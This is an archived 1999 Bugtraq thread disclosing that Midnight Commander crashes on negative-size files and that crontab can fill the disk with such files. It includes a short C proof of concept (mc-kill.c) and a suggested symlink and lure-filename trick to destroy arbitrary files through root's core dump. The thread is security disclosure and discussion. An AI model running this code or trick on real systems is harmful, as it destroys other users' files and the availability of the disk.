Yet another bug in Midnight Commander 4.xx - this security hole allows local user to potentially gain root privileges due to improper handling of negative file sizes by MC and resulting core dumps.
d9be9334ccae908006a722bfc3d2c16782d3e46589d80e3bcd06ea5519e5cd55
Date: Thu, 15 Apr 1999 06:16:08 -0000
From: Maurycy Prodeus <z33d@LIGHTING.ML.ORG>
To: BUGTRAQ@netspace.org
Subject: Large size file and Midnight/bug in crontab with this file
Hello ...
*******************************************************************************
*
* I. -= Midnight small buf =-
*
* II. -= Large size file - you can fill disk too with crontab ( Michal
* Zalewski found this )
*
*******************************************************************************
I.
This time I found another bug in Midnight Commander 4.xx [ i used 4.1.33 ;)] ...
We can make a Segmentation Fault and if root doesn't lock this , it causes
Core Dumping ... ofcourse we just make some file in /tmp (?) and if root
read this file ... his mc creates core... yeesss we can make symlink to
every file in system ... and this file will be total destroy !
Together with "Social Engeering",it is dangerous . [ filename may be example :
hacker.tools or sth. ]
What file we must create ?
With negative size , but really it is a very large size ;-) ( very strange
that even in kernel 2.2.5 it is posible )
Quick test : Run this program and next run mc and try read [ F3 ofcourse
and example PageDown ] file which was created by mc-kill ...
--------- mc-kill.c ------------
#include <sys/file.h>
#include <stdio.h>
#define size -900000
main(int argc,char* argv[]) {
int i;
if (!argv[1]) {
printf("\nUSAGE : %s filename[and patch] \n\n",argv[0]);
exit(0);
}
fchmod(i=open(argv[1],O_RDWR|O_CREAT,0600),0666);
ftruncate(i,size);
fsync(i);
}
------------ end of mc-kill.c ---------------
SOLUTION
You NEVER read strange file in MC ...:-)
hmmm seriously : lcamtuf [ http://dione.ids.pl ] wrote kernel module which
not allow to create symlinks in /tmp ...
II.
If you use above program ( or /dev/zero :-) ) you may fill partition ...
When crontab is reading file , creates temp in /var/spool/cron/ ( non-root
can't even read this - lcamtuf ) But , if it doesn't finish then doesn't
delete
this temp file ... OK. So , we must give crontab file with "infinit" size
.
Example : crontab -file-made-by-mc-kill
SOLUTION
It isn't very dangerous.
*******************************************************************************
z33d email : z33d@lighting.ml.org www : z33d.lighting.ml.org
Jesli nie istnieje racjonalna strategia optymalna , optymalna strategia
jest strategia losowa ...
- unknown -
---------------------------------------------------------------------------------
Date: Thu, 15 Apr 1999 21:06:42 +0200
From: Mixter <mixter@POPMAIL.COM>
To: BUGTRAQ@netspace.org
Subject: Re: Large size file and Midnight/bug in crontab with this file
On Thu, 15 Apr 1999, Maurycy Prodeus wrote:
> With negative size , but really it is a very large size ;-) ( very strange
> that even in kernel 2.2.5 it is posible )
That program you wrote is very scary :)
Any user can create files on any kind of partition with a
"negative" size (ie. with wrong file structure information).
IMO, this is a problem of a linux x86 kernel instruction..
ftruncate() :
movl %ebx,%edx
movl 0x8(%esp,1),%ecx
movl 0x4(%esp,1),%ebx
movl $0x5d,%eax
int $0x80
movl %edx,%ebx
cmpl $0xfffff001,%eax
jae 0x804ccf0 <__syscall_error>
ret
This is a sample interrupt which truncates a file belonging to
a file descriptor to any size, including negative, unchecked...
Doing this on a EXT2 fs will get you the error:
EXT2-fs warning (device 03:03): ext2_getblk: block < 0
Any further write access causes the same error... I think
that alot of programs are not prepared for "negative"-size files
and could encounter race conditions, panics, segfaults with this.
The ability of creating such files should be disabled in further
linux kernel releases (anyone tried this on BSD, SunOS etc. yet?).
Mixter